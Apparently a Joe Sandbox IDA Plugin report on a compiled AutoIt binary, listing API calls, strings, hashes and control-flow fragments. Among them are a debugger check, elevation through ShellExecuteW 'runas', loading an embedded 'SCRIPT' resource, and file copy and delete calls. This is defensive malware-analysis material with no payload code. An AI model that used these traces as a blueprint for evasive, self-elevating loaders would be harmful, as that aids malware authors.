calls 102214->102217 102223 3246c1 Mailbox 102214->102223 102215->102198 102216->102214 102217->102223 102218->102198 102219 3279f2 59 API calls 102218->102219 102666 327924 59 API calls 2 library calls 102218->102666 
102219->102218 102222 35d590 102220->102222 102227 35d57b 102220->102227 102225 327bcc 59 API calls 102221->102225 102224 327bcc 59 API calls 102222->102224 102223->101687 102224->102218 102225->102218 102228 327bcc 59 API calls 102227->102228 102228->102218 102230 327e4f 59 API calls 102229->102230 102231 3279fd 102230->102231 102231->101694 102231->101696 102233 38408d 102232->102233 102234 3840a0 102233->102234 102235 384092 102233->102235 102237 327667 59 API calls 102234->102237 102236 328047 59 API calls 102235->102236 102285 38409b Mailbox 102236->102285 102238 3840a8 102237->102238 102239 327667 59 API calls 102238->102239 102240 3840b0 102239->102240 102241 327667 59 API calls 102240->102241 102242 3840bb 102241->102242 102243 327667 59 API calls 102242->102243 102244 3840c3 102243->102244 102245 327667 59 API calls 102244->102245 102246 3840cb 102245->102246 102247 327667 59 API calls 102246->102247 102248 3840d3 102247->102248 102249 327667 59 API calls 102248->102249 102250 3840db 102249->102250 102251 327667 59 API calls 102250->102251 102252 3840e3 102251->102252 102253 32459b 59 API calls 102252->102253 102254 3840fa 102253->102254 102255 32459b 59 API calls 102254->102255 102256 384113 102255->102256 102257 3279f2 59 API calls 102256->102257 102258 38411f 102257->102258 102259 384132 102258->102259 102260 327d2c 59 API calls 102258->102260 102261 3279f2 59 API calls 102259->102261 102260->102259 102262 38413b 102261->102262 102263 38414b 102262->102263 102264 327d2c 59 API calls 102262->102264 102265 328047 59 API calls 102263->102265 102264->102263 102266 384157 102265->102266 102267 327b2e 59 API calls 102266->102267 102268 384163 102267->102268 102667 384223 59 API calls 102268->102667 102270 384172 102668 384223 59 API calls 102270->102668 102272 384185 102273 3279f2 59 API calls 102272->102273 102274 38418f 102273->102274 102275 384194 102274->102275 102276 3841a6 102274->102276 102285->101711 102287 389162 __ftell_nolock 102286->102287 102288 

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00323B68
• IsDebuggerPresent.KERNEL32 ref: 00323B7A
• GetFullPathNameW.KERNEL32(00007FFF,?,?,003E52F8,003E52E0,?,?), ref: 00323BEB
  • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
  • Part of subcall function 0033092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00323C14,003E52F8,?,?,?), ref: 0033096E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00323C6F
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003D7770,00000010), ref: 0035D281
• SetCurrentDirectoryW.KERNEL32(?,003E52F8,?,?,?), ref: 0035D2B9
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003D4260,003E52F8,?,?,?), ref: 0035D33F
• ShellExecuteW.SHELL32(00000000,?,?), ref: 0035D346
  • Part of subcall function 00323A46: GetSysColorBrush.USER32(0000000F), ref: 00323A50
  • Part of subcall function 00323A46: LoadCursorW.USER32(00000000,00007F00), ref: 00323A5F
  • Part of subcall function 00323A46: LoadIconW.USER32(00000063), ref: 00323A76
  • Part of subcall function 00323A46: LoadIconW.USER32(000000A4), ref: 00323A88
  • Part of subcall function 00323A46: LoadIconW.USER32(000000A2), ref: 00323A9A
  • Part of subcall function 00323A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00323AC0
  • Part of subcall function 00323A46: RegisterClassExW.USER32(?), ref: 00323B16
  • Part of subcall function 003239D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00323A03
  • Part of subcall function 003239D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00323A24
  • Part of subcall function 003239D5: ShowWindow.USER32(00000000,?,?), ref: 00323A38
  • Part of subcall function 003239D5: ShowWindow.USER32(00000000,?,?), ref: 00323A41
  • Part of subcall function 0032434A: _memset.LIBCMT ref: 00324370
  • Part of subcall function 0032434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00324415
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: This is a third-party compiled AutoIt script.$runas$%;
• API String ID: 529118366-424290769
• Opcode ID: 1136eef20ab8e07f18c89b32f90e50f9feb76e0db2164cdad06865351c0483d1
• Instruction ID: d6062b1de3144d38e0e69a2611aa119544c54c520a63f4b350a47aaf86beaa08
• Opcode Fuzzy Hash: 1136eef20ab8e07f18c89b32f90e50f9feb76e0db2164cdad06865351c0483d1
• Instruction Fuzzy Hash: 4B510535D082A8AECF23EBB4FC45EED7B7CAB45744F004A65F511BA2E1DA744605CB20

Control-flow Graph

[control-flow graph edge list omitted; nodes 1037-1103, entry block 3249a0-324a00. API calls named in the graph: GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, FreeLibrary]
APIs
• GetVersionExW.KERNEL32(?), ref: 003249CD
  • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
• GetCurrentProcess.KERNEL32(?,003AFAEC,00000000,00000000,?), ref: 00324A9A
• IsWow64Process.KERNEL32(00000000), ref: 00324AA1
• GetNativeSystemInfo.KERNELBASE(00000000), ref: 00324AE7
• FreeLibrary.KERNEL32(00000000), ref: 00324AF2
• GetSystemInfo.KERNEL32(00000000), ref: 00324B23
• GetSystemInfo.KERNEL32(00000000), ref: 00324B2F
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
• String ID:
• API String ID: 1986165174-0
• Opcode ID: fc9f58d08072eb3e529db3c12d684c9eace3cd3fa55ca452dd2d016cd600e70c
• Instruction ID: 7bc7105d8eb931f8529c4c313f06e905fc96b611a0602160f6e07ddd0c7fae2e
• Opcode Fuzzy Hash: fc9f58d08072eb3e529db3c12d684c9eace3cd3fa55ca452dd2d016cd600e70c
• Instruction Fuzzy Hash: FC91C3319897D0DEC733CB7894505AAFFF9AF2A301B4449ADD0CB93A11D260E50CC759

Control-flow Graph

[control-flow graph edge list omitted; nodes 1104-1111, entry block 324e89-324ea1. API calls named in the graph: CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource]
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00324D8E,?,?,00000000,00000000), ref: 00324E99
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00324D8E,?,?,00000000,00000000), ref: 00324EB0
• LoadResource.KERNEL32(?,00000000,?,?,00324D8E,?,?,00000000,00000000,?,?,?,?,?,?,00324E2F), ref: 0035D937
• SizeofResource.KERNEL32(?,00000000,?,?,00324D8E,?,?,00000000,00000000,?,?,?,?,?,?,00324E2F), ref: 0035D94C
• LockResource.KERNEL32(00324D8E,?,?,00324D8E,?,?,00000000,00000000,?,?,?,?,?,?,00324E2F,00000000), ref: 0035D95F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: 30e2cd8ea71c24643cac9e03a7827c0bcb1a07ed8ff964b1037213bac1742b15
• Instruction ID: 9fbe562ef5969c9363234b0e8415295e7782c457dbcb14cd7eee86dc55f3077f
• Opcode Fuzzy Hash: 30e2cd8ea71c24643cac9e03a7827c0bcb1a07ed8ff964b1037213bac1742b15
• Instruction Fuzzy Hash: 9C112E75240711BFE7228BA5EC48F677BBEFBC6B51F118668F40596650DB61EC008A60
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: pb>$%;
• API String ID: 3964851224-2616112080
• Opcode ID: bee9d3c1709789d2909ac16a2d066c70ca7bc85d211b9fdbc724224a910c9fe4
• Instruction ID: 6bd9799e6682cf1356f6036d8d8987ba3d4d5b7b170260022c730db7769c8126
• Opcode Fuzzy Hash: bee9d3c1709789d2909ac16a2d066c70ca7bc85d211b9fdbc724224a910c9fe4
• Instruction Fuzzy Hash: 3B929A74A08341CFD72ADF24C490B2AB7E5BF85304F15896DE88A8B362D775EC45CB92
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID:
• String ID: Dd>$Dd>$Dd>$Dd>$Variable must be of type 'Object'.
• API String ID: 0-1081683785
• Opcode ID: 102b4fc75a25bbc71ecc4b11a442b1cb4ed22b7f9d89ea93aa69e5bb6a357239
• Instruction ID: d2c8f46ab2eb2d435ab7db61285b7bd42512bbff307571a594795ae8e8e73827
• Opcode Fuzzy Hash: 102b4fc75a25bbc71ecc4b11a442b1cb4ed22b7f9d89ea93aa69e5bb6a357239
• Instruction Fuzzy Hash: DCA2CE74A00225CFCB26CF58E482AAEB7B5FF59310F258469E805AF351D734ED82CB90
APIs
• GetFileAttributesW.KERNELBASE(?,0035E398), ref: 0038446A
• FindFirstFileW.KERNELBASE(?,?), ref: 0038447B
• FindClose.KERNEL32(00000000), ref: 0038448B
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: a6be019c2c003aeb99768307444bc055370a47f2617c9ae57caf99325a96c127
• Instruction ID: 7765e54e85ef31d4eb9d2699e109ea4300832d9304efe3531093cb5872d2b859
• Opcode Fuzzy Hash: a6be019c2c003aeb99768307444bc055370a47f2617c9ae57caf99325a96c127
• Instruction Fuzzy Hash: 62E0D8364146016B82117B78EC0D5E97B9C9F06335F100B55F835C24E0E7B49D009695
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00330A5B
                                                                                                                    • timeGetTime.WINMM ref: 00330D16
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00330E53
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00330E61
                                                                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00330EFA
                                                                                                                    • DestroyWindow.USER32 ref: 00330F06
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00330F20
                                                                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00364E83
                                                                                                                    • TranslateMessage.USER32(?), ref: 00365C60
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00365C6E
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00365C82
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb>$pb>$pb>$pb>
                                                                                                                    • API String ID: 4212290369-2037319231
                                                                                                                    • Opcode ID: fd9b41bd3ebbc31dcbc1c2399a33ba954afce8ffd7f5fa8c8bc223c3222d4775
                                                                                                                    • Instruction ID: 02b529737f2da7c924dc93a2dbb333dde6f38051c9dc2c798af0a6d79e4cd426
                                                                                                                    • Opcode Fuzzy Hash: fd9b41bd3ebbc31dcbc1c2399a33ba954afce8ffd7f5fa8c8bc223c3222d4775
                                                                                                                    • Instruction Fuzzy Hash: D2B2E570608741DFD72BDF24C895BAAB7E4BF85304F14892DF5999B2A1CB71E884CB42

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00388F5F: __time64.LIBCMT ref: 00388F69
                                                                                                                      • Part of subcall function 00324EE5: _fseek.LIBCMT ref: 00324EFD
                                                                                                                    • __wsplitpath.LIBCMT ref: 00389234
                                                                                                                      • Part of subcall function 003440FB: __wsplitpath_helper.LIBCMT ref: 0034413B
                                                                                                                    • _wcscpy.LIBCMT ref: 00389247
                                                                                                                    • _wcscat.LIBCMT ref: 0038925A
                                                                                                                    • __wsplitpath.LIBCMT ref: 0038927F
                                                                                                                    • _wcscat.LIBCMT ref: 00389295
                                                                                                                    • _wcscat.LIBCMT ref: 003892A8
                                                                                                                      • Part of subcall function 00388FA5: _memmove.LIBCMT ref: 00388FDE
                                                                                                                      • Part of subcall function 00388FA5: _memmove.LIBCMT ref: 00388FED
                                                                                                                    • _wcscmp.LIBCMT ref: 003891EF
                                                                                                                      • Part of subcall function 00389734: _wcscmp.LIBCMT ref: 00389824
                                                                                                                      • Part of subcall function 00389734: _wcscmp.LIBCMT ref: 00389837
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00389452
                                                                                                                    • _wcsncpy.LIBCMT ref: 003894C5
                                                                                                                    • DeleteFileW.KERNEL32(?,?), ref: 003894FB
                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00389511
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00389522
                                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00389534
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1500180987-0
                                                                                                                    • Opcode ID: b0fd50a4bf397a00b506b591cbdac6decf52a4093e1672d3fe89d691ca11474e
                                                                                                                    • Instruction ID: 379f62d44b7b169c84bb9366448cf1fa3268bdefed494ab2dec8d13b71750856
                                                                                                                    • Opcode Fuzzy Hash: b0fd50a4bf397a00b506b591cbdac6decf52a4093e1672d3fe89d691ca11474e
                                                                                                                    • Instruction Fuzzy Hash: 4BC130B1D00219AADF12EF95CC85EEEB7BDEF45310F0044A6F609EB151EB709A448F65

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00323074
                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 0032309E
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003230AF
                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 003230CC
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003230DC
                                                                                                                    • LoadIconW.USER32(000000A9), ref: 003230F2
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00323101
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                    • Opcode ID: e01a0db347d66f049bb4ad8e0c5dfa3a77af8f5de1813d8007e927519948bb85
                                                                                                                    • Instruction ID: e2874d23d07aa1797a5e96d6d0adc3f857dcb90c3743f53a4e621a9f4a7ddee6
                                                                                                                    • Opcode Fuzzy Hash: e01a0db347d66f049bb4ad8e0c5dfa3a77af8f5de1813d8007e927519948bb85
                                                                                                                    • Instruction Fuzzy Hash: B2313AB1941349DFDB12CFE4E8846C9BBF8FB09314F14466AE580EA2A0D3B54585CF51

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00323074
                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 0032309E
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003230AF
                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 003230CC
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003230DC
                                                                                                                    • LoadIconW.USER32(000000A9), ref: 003230F2
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00323101
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                    • Opcode ID: a03765513f8aa38dd146ed6abc7684c71b8317e32994160016e20bdf5e33bba5
                                                                                                                    • Instruction ID: 10b2455c30022424c813d718dc183cf64656412d9da64009c54445a9b6277f72
                                                                                                                    • Opcode Fuzzy Hash: a03765513f8aa38dd146ed6abc7684c71b8317e32994160016e20bdf5e33bba5
                                                                                                                    • Instruction Fuzzy Hash: E021C5B5901358AFDB12DFE4E889BDDBBF8FB09704F00422AF610AA2A0D7B145448F95

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00324706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003E52F8,?,003237AE,?), ref: 00324724
                                                                                                                      • Part of subcall function 0034050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00327165), ref: 0034052D
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003271A8
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0035E8C8
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0035E909
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0035E947
                                                                                                                    • _wcscat.LIBCMT ref: 0035E9A0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                    • API String ID: 2673923337-2727554177
                                                                                                                    • Opcode ID: 1e7a8b5f30af951486c231b39bab57fe5c4114c3ff1c2633dbec28556815fca6
                                                                                                                    • Instruction ID: 622b720250678264ccafe4a892071c25383d2a80f63e217742d298b2e997302f
                                                                                                                    • Opcode Fuzzy Hash: 1e7a8b5f30af951486c231b39bab57fe5c4114c3ff1c2633dbec28556815fca6
                                                                                                                    • Instruction Fuzzy Hash: 7871AD715083519EC316EF65E88299BBBECFF55350F400A2EF5458B2B0DB319948CB92

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Control-flow graph of the function at 00323633 (rendered as an image in the original report): basic blocks 323633-32375f and 35d06f-35d16e, calling DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, MoveWindow and SetFocus.
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 003236D2
• KillTimer.USER32(?,00000001), ref: 003236FC
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0032371F
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0032372A
• CreatePopupMenu.USER32 ref: 0032373E
• PostQuitMessage.USER32(00000000), ref: 0032374D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated$%;
• API String ID: 129472671-4181185554
• Opcode ID: 223b1cb7929293e234969c5ceb04f614f1cce62598967fb8358a73609aefd506
• Instruction ID: 65a9837fc6a0e6f03ac266737bfedbca5386948b587b9764698d722252564c62
• Opcode Fuzzy Hash: 223b1cb7929293e234969c5ceb04f614f1cce62598967fb8358a73609aefd506
• Instruction Fuzzy Hash: FE4136B2200565BBDF376F68FC89B79375CEB05340F100625FA029A2F1DB6A9E059761

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00323A50
• LoadCursorW.USER32(00000000,00007F00), ref: 00323A5F
• LoadIconW.USER32(00000063), ref: 00323A76
• LoadIconW.USER32(000000A4), ref: 00323A88
• LoadIconW.USER32(000000A2), ref: 00323A9A
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00323AC0
• RegisterClassExW.USER32(?), ref: 00323B16
  • Part of subcall function 00323041: GetSysColorBrush.USER32(0000000F), ref: 00323074
  • Part of subcall function 00323041: RegisterClassExW.USER32(00000030), ref: 0032309E
  • Part of subcall function 00323041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003230AF
  • Part of subcall function 00323041: InitCommonControlsEx.COMCTL32(?), ref: 003230CC
